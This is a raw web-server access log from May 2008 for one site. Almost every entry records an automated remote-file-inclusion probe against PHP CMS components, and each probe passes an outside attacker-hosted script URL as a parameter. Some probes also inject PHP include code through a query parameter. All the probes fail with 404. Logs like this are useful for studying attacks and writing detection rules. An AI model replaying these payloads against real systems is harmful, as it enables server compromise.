195.155.232.37 - - [01/May/2008:09:05:46 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:05:47 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.187 - - [01/May/2008:09:05:57 -0700] "GET //ashnews.php?pathtoashnews=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.223.226.77 - - [01/May/2008:09:06:08 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.94.221.218 - - [01/May/2008:09:06:17 -0700] "GET /logs/access_071224.log/index.php?pageurl=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:06:17 -0700] "GET /logs/access_080321.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:06:37 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:06:37 -0700] "GET /logs/access_080321.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:06:40 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.92 - - [01/May/2008:09:06:40 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:07:02 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:07:02 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:07:02 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.108.82 - - [01/May/2008:09:07:07 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.108.82 - - [01/May/2008:09:07:15 -0700] "GET /logs/access_080213.log//codebb/lang_select?phpbb_root_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.121 - - [01/May/2008:09:07:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.223 - - [01/May/2008:09:07:20 -0700] "GET /logs/access_070930.log HTTP/1.0" 200 32172 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.86.181.227 - - [01/May/2008:09:07:21 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:25 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:25 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:25 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:25 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:25 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:25 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.88.4.5 - - [01/May/2008:09:07:31 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://computasiunair.com/paddy/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:07:33 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:07:33 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:07:33 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:36 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:37 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:07:37 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:07:38 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:07:38 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:07:39 -0700] "GET /logs/access_080205.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.108.82 - - [01/May/2008:09:07:40 -0700] "GET /logs//popup_window.php?site_isp_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.108.82 - - [01/May/2008:09:07:40 -0700] "GET //popup_window.php?site_isp_root=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:40 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:41 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:41 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:42 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:42 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.195.58.186 - - [01/May/2008:09:07:42 -0700] "GET /logs/access.log HTTP/1.0" 200 33716 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:44 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:44 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:07:48 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:07:48 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:07:48 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:51 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:51 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:07:55 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:56 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:56 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:07:56 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.87.154.155 - - [01/May/2008:09:08:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.154.155 - - [01/May/2008:09:08:03 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:08:05 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:08:08 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:08:09 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:08:09 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:08:10 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:08:11 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:08:14 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:08:21 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:08:24 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:08:24 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:08:34 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:08:35 -0700] "GET //Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:08:35 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.165.216.146 - - [01/May/2008:09:08:41 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://finkel.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:01 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:01 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:02 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:02 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:24 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [01/May/2008:09:09:25 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/fuker00/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:09:38 -0700] "GET /logs/access_080205.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:09:40 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:09:40 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:09:40 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:09:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.203.76.10 - - [01/May/2008:09:09:42 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:09:43 -0700] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:09:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:09:43 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.94.50 - - [01/May/2008:09:09:51 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:09:52 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [01/May/2008:09:10:11 -0700] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.31.64.50 - - [01/May/2008:09:10:19 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://66.7.194.228/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:10:36 -0700] "GET /logs/access_071225.log//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:10:36 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [01/May/2008:09:10:36 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:10:57 -0700] "GET /logs/access_080124.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.31.61.43 - - [01/May/2008:09:10:57 -0700] "GET /logs/homepage.php?sel=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.31.61.43 - - [01/May/2008:09:10:57 -0700] "GET /homepage.php?sel=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:10:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [01/May/2008:09:11:03 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/brian_cool_2007/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:11:39 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.40.15.10 - - [01/May/2008:09:11:41 -0700] "GET /logs/access_080321.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:12:04 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:12:05 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.12 - - [01/May/2008:09:12:05 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.ride2eat.com/calendar/albo/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:27 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:27 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:27 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [01/May/2008:09:12:33 -0700] "GET /logs/access_080210.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/id6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:34 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:34 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:34 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:40 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.237.150 - - [01/May/2008:09:12:41 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.207.204.13 - - [01/May/2008:09:12:41 -0700] "GET /logs/access_080305.log//admin/classes/TplLoad.php?full_path_to_public_program=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
